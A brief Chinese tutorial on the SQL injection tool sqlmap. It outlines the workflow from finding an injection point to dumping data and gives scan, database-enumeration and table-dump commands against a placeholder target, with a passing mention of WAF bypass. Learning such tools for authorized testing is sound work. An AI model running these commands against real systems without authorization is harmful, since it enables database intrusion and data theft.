sqlmap使用与SQL注入自动化实战

sqlmap SQL 注入自动化实战:基础使用、检测注入、提取数据、WAF 绕过、POST 注入、Cookie 注入。

写在前面:合法学习边界

sqlmap 只在授权测试环境使用。

一、sqlmap 工作流程

sqlmap 工作流程
1
① 发现注入点 → ② 自动检测 → ③ 获取数据库 → ④ 读取表/列 → ⑤ Dump 数据

二、常用命令

1
2
3
4
5
6
7
8
# 基础扫描
sqlmap -u "http://target/?id=1" --batch

# 获取数据库
sqlmap -u "http://target/?id=1" --dbs

# Dump 数据
sqlmap -u "http://target/?id=1" -D db -T table --dump

三、小结

sqlmap 是 SQL 注入自动化的核心工具。--batch 实现全自动扫描,配合 tamper 脚本绕过 WAF。